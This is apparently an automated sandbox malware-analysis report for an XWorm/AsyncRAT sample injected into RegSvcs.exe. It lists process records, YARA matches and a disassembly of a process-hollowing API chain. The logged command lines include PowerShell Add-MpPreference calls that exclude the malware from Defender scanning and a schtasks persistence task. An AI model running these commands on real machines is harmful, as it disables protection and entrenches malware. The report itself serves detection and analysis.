                                                            Target ID:1
                                                            Start time:11:27:55
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                                                            Imagebase:0x8a0000
                                                            File size:45'984 bytes
                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.4472153266.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.4466712602.0000000000402000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000002.4466712602.0000000000402000.00000020.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:3
                                                            Start time:11:27:59
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe'
                                                            Imagebase:0xf20000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.2068390929.00000000044F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:11:27:59
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:11:28:03
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'regsvcs.exe'
                                                            Imagebase:0xf20000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:7
                                                            Start time:11:28:03
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:8
                                                            Start time:11:28:06
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\XClient.exe'
                                                            Imagebase:0xf20000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:9
                                                            Start time:11:28:06
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:10
                                                            Start time:11:28:11
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                                                            Imagebase:0xf20000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:11
                                                            Start time:11:28:11
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:13
                                                            Start time:11:28:18
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\XClient.exe"
                                                            Imagebase:0x3e0000
                                                            File size:187'904 bytes
                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:14
                                                            Start time:11:28:18
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:15
                                                            Start time:11:28:19
                                                            Start date:09/09/2024
                                                            Path:C:\Users\user\XClient.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\XClient.exe
                                                            Imagebase:0x240000
                                                            File size:45'984 bytes
                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 0%, ReversingLabs
                                                            Has exited:true

                                                            General

                                                            Target ID:16
                                                            Start time:11:28:19
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:17
                                                            Start time:11:28:28
                                                            Start date:09/09/2024
                                                            Path:C:\Users\user\XClient.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\XClient.exe"
                                                            Imagebase:0xda0000
                                                            File size:45'984 bytes
                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:18
                                                            Start time:11:28:29
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:19
                                                            Start time:11:28:37
                                                            Start date:09/09/2024
                                                            Path:C:\Users\user\XClient.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\XClient.exe"
                                                            Imagebase:0xd60000
                                                            File size:45'984 bytes
                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:20
                                                            Start time:11:28:37
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:22
                                                            Start time:11:29:01
                                                            Start date:09/09/2024
                                                            Path:C:\Users\user\XClient.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\XClient.exe
                                                            Imagebase:0xc00000
                                                            File size:45'984 bytes
                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:23
                                                            Start time:11:29:01
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:24
                                                            Start time:11:30:00
                                                            Start date:09/09/2024
                                                            Path:C:\Users\user\XClient.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\XClient.exe
                                                            Imagebase:0xcd0000
                                                            File size:45'984 bytes
                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:25
                                                            Start time:11:30:00
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:26
                                                            Start time:11:31:00
                                                            Start date:09/09/2024
                                                            Path:C:\Users\user\XClient.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\XClient.exe
                                                            Imagebase:0x9a0000
                                                            File size:45'984 bytes
                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:27
                                                            Start time:11:31:00
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:28
                                                            Start time:11:32:00
                                                            Start date:09/09/2024
                                                            Path:C:\Users\user\XClient.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\XClient.exe
                                                            Imagebase:0xab0000
                                                            File size:45'984 bytes
                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:29
                                                            Start time:11:32:00
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:11.9%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:57.7%
                                                              Total number of Nodes:26
                                                              Total number of Limit Nodes:1
                                                              execution_graph 7888 4c13750 7889 4c13798 VirtualProtect 7888->7889 7890 4c137d2 7889->7890 7891 4c1ab96 7895 4c19bec 7891->7895 7892 4c1abd3 7892->7892 7895->7892 7897 4c18a3c VirtualProtectEx 7895->7897 7899 4c18a30 NtWriteVirtualMemory 7895->7899 7902 4c18a0c 7895->7902 7906 4c18a18 7895->7906 7910 4c18a24 7895->7910 7914 4c18a48 7895->7914 7918 4c18a54 7895->7918 7922 4c18a60 7895->7922 7897->7895 7899->7895 7903 4c1aed8 CreateProcessA 7902->7903 7905 4c1b10e 7903->7905 7907 4c1b1d8 NtUnmapViewOfSection 7906->7907 7909 4c1b249 7907->7909 7909->7895 7911 4c1b278 NtAllocateVirtualMemory 7910->7911 7913 4c1b306 7911->7913 7913->7895 7915 4c1b8a0 NtSetContextThread 7914->7915 7917 4c1b911 7915->7917 7917->7895 7919 4c1b8a0 NtSetContextThread 7918->7919 7921 4c1b911 7919->7921 7921->7895 7923 4c1b9d0 NtResumeThread 7922->7923 7925 4c1ba49 7923->7925 7925->7895

                                                              Executed Functions

                                                              Function 04C19B58 Relevance: 3.5, Strings: 2, Instructions: 958COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 13 4c19b58-4c19b8a 14 4c19b91-4c19be7 13->14 15 4c19b8c 13->15 16 4c1abb6-4c1abcd 14->16 15->14 17 4c1abd3-4c1abda 16->17 18 4c19bec-4c19cd2 16->18 17->17 19 4c1abdc-4c1abe4 17->19 27 4c19cd4-4c19d17 18->27 28 4c19d19-4c19d3e 18->28 33 4c19d44-4c19d60 27->33 28->33 35 4c19d62-4c19d69 33->35 36 4c19d8f 33->36 35->35 37 4c19d6b-4c19d70 35->37 38 4c19d99-4c19e01 call 4c19ab8 36->38 39 4c19d82-4c19d8d 37->39 40 4c19d72-4c19d7c 37->40 48 4c19e10 38->48 49 4c19e03-4c19e0e 38->49 39->38 40->39 50 4c19e1a-4c19e4b call 4c19ab8 48->50 49->50 54 4c19e63 50->54 55 4c19e4d-4c19e54 50->55 56 4c19e6d-4c19eb4 54->56 55->55 57 4c19e56-4c19e61 55->57 60 4c19ee3-4c19ef1 56->60 61 4c19eb6-4c19ec9 56->61 57->56 63 4c19ef7-4c19f02 60->63 61->61 62 4c19ecb-4c19ee1 61->62 62->63 64 4c19f0d-4c19f2e call 4c18a0c 63->64 66 4c19f33-4c19f60 64->66 67 4c19f92-4c19fe0 66->67 68 4c19f62-4c19f69 66->68 75 4c19fe2-4c19fe9 67->75 76 4c1a02d-4c1a05b 67->76 68->68 69 4c19f6b-4c19f87 68->69 69->67 75->75 77 4c19feb-4c1a02b 75->77 82 4c1a061-4c1a070 call 4c18a18 76->82 77->82 84 4c1a075-4c1a07c 82->84 85 4c1a085-4c1a0a8 call 4c18a24 84->85 87 4c1a0ad-4c1a0bb 85->87 88 4c1a0c1-4c1a0c8 87->88 89 4c1a156 87->89 88->88 91 4c1a0ca-4c1a0db call 4c18a30 88->91 90 4c1a160-4c1a180 89->90 93 4c1a1b2-4c1a1bb 90->93 94 4c1a182-4c1a189 90->94 95 4c1a0e0-4c1a0ee 91->95 96 4c1a633-4c1a64f 93->96 94->94 97 4c1a18b-4c1a1a7 94->97 95->89 98 4c1a0f0-4c1a0f7 95->98 99 4c1a1c0-4c1a25b call 4c19ab8 * 2 96->99 100 4c1a655-4c1a668 96->100 97->93 98->98 101 4c1a0f9-4c1a110 98->101 119 4c1a292-4c1a328 99->119 120 4c1a25d-4c1a264 99->120 107 4c1a6b7-4c1a6e8 100->107 108 4c1a66a-4c1a671 100->108 106 4c1a117-4c1a135 call 4c18a3c 101->106 113 4c1a13a-4c1a154 106->113 121 4c1a6ee-4c1a6fd call 4c18a48 107->121 108->108 112 4c1a673-4c1a6b5 108->112 112->121 113->90 142 4c1a333-4c1a34b call 4c19ab8 119->142 120->120 122 4c1a266-4c1a291 120->122 126 4c1a702-4c1a72e 121->126 122->119 129 4c1a760-4c1a798 126->129 130 4c1a730-4c1a737 126->130 135 4c1a8f9-4c1aa06 call 4c18a30 129->135 136 4c1a79e-4c1a7a5 129->136 130->130 131 4c1a739-4c1a755 130->131 131->129 165 4c1aa08-4c1aa24 135->165 166 4c1aa2f-4c1aa84 135->166 136->136 138 4c1a7a7-4c1a81b 136->138 160 4c1a827-4c1a843 call 4c18a30 138->160 146 4c1a350-4c1a41f call 4c19b00 * 2 142->146 164 4c1a424-4c1a445 call 4c18a30 146->164 167 4c1a848-4c1a881 160->167 172 4c1a44a-4c1a483 164->172 165->166 181 4c1aa85-4c1aa8b call 4c18a54 166->181 169 4c1a8b3-4c1a8f4 167->169 170 4c1a883-4c1a88a 167->170 169->181 170->170 174 4c1a88c-4c1a8a8 170->174 175 4c1a485-4c1a4a1 172->175 176 4c1a4ac-4c1a519 172->176 174->169 175->176 190 4c1a547-4c1a568 176->190 191 4c1a51b-4c1a545 176->191 188 4c1aa90-4c1aac9 181->188 192 4c1aafb-4c1ab01 call 4c18a60 188->192 193 4c1aacb-4c1aad2 188->193 194 4c1a56e-4c1a576 190->194 191->194 197 4c1ab06-4c1ab3f 192->197 193->193 195 4c1aad4-4c1aaf0 193->195 200 4c1a57d-4c1a5b3 call 4c18a3c 194->200 195->192 198 4c1ab41-4c1ab5d 197->198 199 4c1ab68-4c1abad 197->199 198->199 199->16 199->19 208 4c1a5b8-4c1a5f0 200->208 209 4c1a622-4c1a62d 208->209 210 4c1a5f2-4c1a5f9 208->210 209->96 210->210 211 4c1a5fb-4c1a617 210->211 211->209
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020772650.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4c10000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0$H
                                                              • API String ID: 0-1388647558
                                                              • Opcode ID: cad4e8dfbcec79a56923629f86901d04a77a44b5c09c1487a8c75b5fd8220919
                                                              • Instruction ID: e77430fa8b9118897b2d81fe7a5f3d8e1e271a65a218abdd2d24090e433759dc
                                                              • Opcode Fuzzy Hash: cad4e8dfbcec79a56923629f86901d04a77a44b5c09c1487a8c75b5fd8220919
                                                              • Instruction Fuzzy Hash: A8A2AF74E052298FDB64DF65D998BDDBBB2BF89300F1091EAD809A7250DB346E81DF10
                                                              Function 04C18A24 Relevance: 1.6, APIs: 1, Instructions: 61memorynativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 351 4c18a24-4c1b304 NtAllocateVirtualMemory 354 4c1b306-4c1b30c 351->354 355 4c1b30d-4c1b32a 351->355 354->355
                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 04C1B2F7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020772650.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4c10000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: d118e6d795d957310a350c43bbbc71d03e32fd97f675e01808715f81d444c66f
                                                              • Instruction ID: 6635c0a2cd230cb1edae6ff849463c75d0a84e75442c39ee690dc767f84391a1
                                                              • Opcode Fuzzy Hash: d118e6d795d957310a350c43bbbc71d03e32fd97f675e01808715f81d444c66f
                                                              • Instruction Fuzzy Hash: BE21F3B1D00259AFCB10DF9AD884ADEFBB5FF09310F10851AE918A7210D374A954CFE1
                                                              Function 04C18A30 Relevance: 1.6, APIs: 1, Instructions: 61nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 358 4c18a30-4c1b38e 361 4c1b390-4c1b39c 358->361 362 4c1b39e-4c1b3d1 NtWriteVirtualMemory 358->362 361->362 363 4c1b3d3-4c1b3d9 362->363 364 4c1b3da-4c1b3ee 362->364 363->364
                                                              APIs
                                                              • NtWriteVirtualMemory.NTDLL(?,?,00000000,?,?), ref: 04C1B3C4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020772650.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4c10000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID: MemoryVirtualWrite
                                                              • String ID:
                                                              • API String ID: 3527976591-0
                                                              • Opcode ID: dbd93dcb5726a2db5462e50f87fa7b8e86d60a5b3a4e565f19dda53df133c6f2
                                                              • Instruction ID: 7ac26e88257543d471350b8ad6e60d595b7289413094900ae41e8ab54a7fa6b1
                                                              • Opcode Fuzzy Hash: dbd93dcb5726a2db5462e50f87fa7b8e86d60a5b3a4e565f19dda53df133c6f2
                                                              • Instruction Fuzzy Hash: 5A2113B5A00249DFCB10CF9AC984BDEBBF5FB49310F10842AE919A7250D778A954CFA1
                                                              Function 04C1B270 Relevance: 1.6, APIs: 1, Instructions: 60memorynativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 373 4c1b270-4c1b304 NtAllocateVirtualMemory 375 4c1b306-4c1b30c 373->375 376 4c1b30d-4c1b32a 373->376 375->376
                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 04C1B2F7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020772650.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4c10000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: 59db2466a8deefb87a66d1f20b418381701c39dfee33e4d72e72d90bc46a451b
                                                              • Instruction ID: fca2b382edd56adf40f5de9507ec2b905ffaa10e0188b0d46f3449cc34c07754
                                                              • Opcode Fuzzy Hash: 59db2466a8deefb87a66d1f20b418381701c39dfee33e4d72e72d90bc46a451b
                                                              • Instruction Fuzzy Hash: 7B21F0B1D00259AFCB00CF9AD884ADEFFB5FF49310F10811AE918A7210D379AA54CFA1
                                                              Function 04C1B338 Relevance: 1.6, APIs: 1, Instructions: 60nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 379 4c1b338-4c1b38e 382 4c1b390-4c1b39c 379->382 383 4c1b39e-4c1b3d1 NtWriteVirtualMemory 379->383 382->383 384 4c1b3d3-4c1b3d9 383->384 385 4c1b3da-4c1b3ee 383->385 384->385
                                                              APIs
                                                              • NtWriteVirtualMemory.NTDLL(?,?,00000000,?,?), ref: 04C1B3C4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020772650.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4c10000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID: MemoryVirtualWrite
                                                              • String ID:
                                                              • API String ID: 3527976591-0
                                                              • Opcode ID: ccce6f340496dfe0fa11803d767c8b968665f1c6be7e16cf9af01fce9b0021d1
                                                              • Instruction ID: 5638269e060ee77a532e706b3d9794f60c36b65530052e3baa69548a858809cd
                                                              • Opcode Fuzzy Hash: ccce6f340496dfe0fa11803d767c8b968665f1c6be7e16cf9af01fce9b0021d1
                                                              • Instruction Fuzzy Hash: C22113B5900249DFCB10CF9AC985BDEBBF5FF49310F10842AE519A7250D778A954CFA1
                                                              Function 04C18A60 Relevance: 1.6, APIs: 1, Instructions: 51nativethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtResumeThread.NTDLL(?,?), ref: 04C1BA3A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020772650.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4c10000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: e4106ba2849d9752f4dde3493414906a822664798560098ca969a86293c17d60
                                                              • Instruction ID: 5cb2b64450dae674d925999cb1487d6cf8ebf560383d50f9fc012cf5dce7b868
                                                              • Opcode Fuzzy Hash: e4106ba2849d9752f4dde3493414906a822664798560098ca969a86293c17d60
                                                              • Instruction Fuzzy Hash: 9211F0B1D002599BCB10DF9AC884A9EFBF8FB49310F10816AE518B3210D378AA44CFE5
                                                              Function 04C1B9C8 Relevance: 1.6, APIs: 1, Instructions: 50nativethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtResumeThread.NTDLL(?,?), ref: 04C1BA3A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020772650.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4c10000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: d8b7382f96013dccbacc9ba30c9ab5d491d9521f593016376bf5fa375efe53ef
                                                              • Instruction ID: a44c69fb2d712639c54a59e4adf013f2c5efc4aaad3d225a49193706f7e6b813
                                                              • Opcode Fuzzy Hash: d8b7382f96013dccbacc9ba30c9ab5d491d9521f593016376bf5fa375efe53ef
                                                              • Instruction Fuzzy Hash: 7A11C0B1D002599BCB10DF9AD584ADEFBF5FB49310F10816AE918A7250D378AA44CFA5
                                                              Function 04C18A48 Relevance: 1.5, APIs: 1, Instructions: 48nativethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtSetContextThread.NTDLL(?,?), ref: 04C1B902
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020772650.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4c10000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID: ContextThread
                                                              • String ID:
                                                              • API String ID: 1591575202-0
                                                              • Opcode ID: 1ad8e5d4901d1bbcef57c8d18725bdf228d488a1a5d6b8165003c1efbc86190a
                                                              • Instruction ID: ca7ef790f277b9eee0c4615be4dbed5098949a3f82d6ceb3ec9969df5c33279d
                                                              • Opcode Fuzzy Hash: 1ad8e5d4901d1bbcef57c8d18725bdf228d488a1a5d6b8165003c1efbc86190a
